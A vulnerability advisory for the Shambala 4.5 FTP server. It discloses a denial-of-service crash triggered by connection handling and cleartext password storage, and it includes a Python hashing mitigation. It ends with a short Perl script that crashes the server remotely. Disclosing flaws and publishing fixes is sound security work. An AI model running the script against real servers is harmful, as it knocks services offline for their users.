Shambala is a low-cost, multi-featured FTP and Web server distributed by Evolvable Corporation. It is used by numerous amateur and small office/home webmasters as an economical way to launch and manage a website. Shambala mishandles connections and disconnections, which could enable a simple denial-of-service attack. A second observation is that Shambala stores passwords in cleartext on the server, a major problem on Windows 95 and 98 platforms.
Credit:
The information has been provided by Niels Heinen.
Vulnerable systems:
Shambala version 4.5
Shambala does not handle all connections correctly. It is therefore possible to crash the FTP server remotely with a custom script that automates opening and closing a connection to the server. The server crashes upon disconnection and gives the following error:
Run-time error `20127` invalid ConnectionID
The second problem is that Shambala stores all passwords in plain text on the server:
c:\program files\shambala\passwords.txt
This is less serious on an NT server, where permissions can be set to deny access to this file. Because the server is also shipped for Windows 95 and Windows 98, any user could gain access to the file on those platforms.
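The usual mitigation for the cleartext storage described above is to keep only a salted, slow hash of each password. The sketch below is an added example, not Shambala code or part of the original advisory; the `user:password` layout of passwords.txt, the sample accounts and the PBKDF2 work factor are assumptions.

```python
import hashlib
import hmac
import os

# Constructed sample. The advisory does not document the layout of
# passwords.txt, so "user:password" lines are an assumption.
CLEARTEXT_SAMPLE = "alice:winter99\nbob:s3cret!\n"

ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$<salt hex>$<digest hex>' for one password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${salt.hex()}${digest.hex()}"


def migrate(cleartext):
    """Convert assumed 'user:password' lines into {user: salted verifier}."""
    store = {}
    for line in cleartext.splitlines():
        if not line.strip():
            continue
        user, sep, password = line.partition(":")
        if not sep:
            raise ValueError(f"malformed record for {user!r}")
        store[user] = hash_password(password)
    return store


# Verifier for a nonexistent account, so unknown users cost the same work
# as known ones and the response time does not reveal which names exist.
_DUMMY = hash_password("placeholder")


def verify(store, user, password):
    """Check a login attempt; the digest comparison is constant-time."""
    record = store.get(user, _DUMMY)
    _, salt_hex, _ = record.split("$")
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, record) and user in store


if __name__ == "__main__":
    for user, record in migrate(CLEARTEXT_SAMPLE).items():
        print(user, record)
```

With records in this form, a local user who reads the file obtains salted verifiers rather than usable passwords; the cleartext file is deleted once migration has been checked.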
Exploit (DoS):
---cut-here---
#!/usr/bin/perl
#
# This tool (tool not exploit!) crashes shambala server 4.5
# This is a stripped version of Guido Bakker's exploit code (thanks)
#
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
&usage if !defined($args{s});
$serv = $args{s};
$EOL="\015\012";
$remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $args{s},
    PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print "Done...\n";
exit; # remove this and the server will *NOT* crash
sub usage {die("\n$0 -s ipaddress\n\n");}
---cut-here---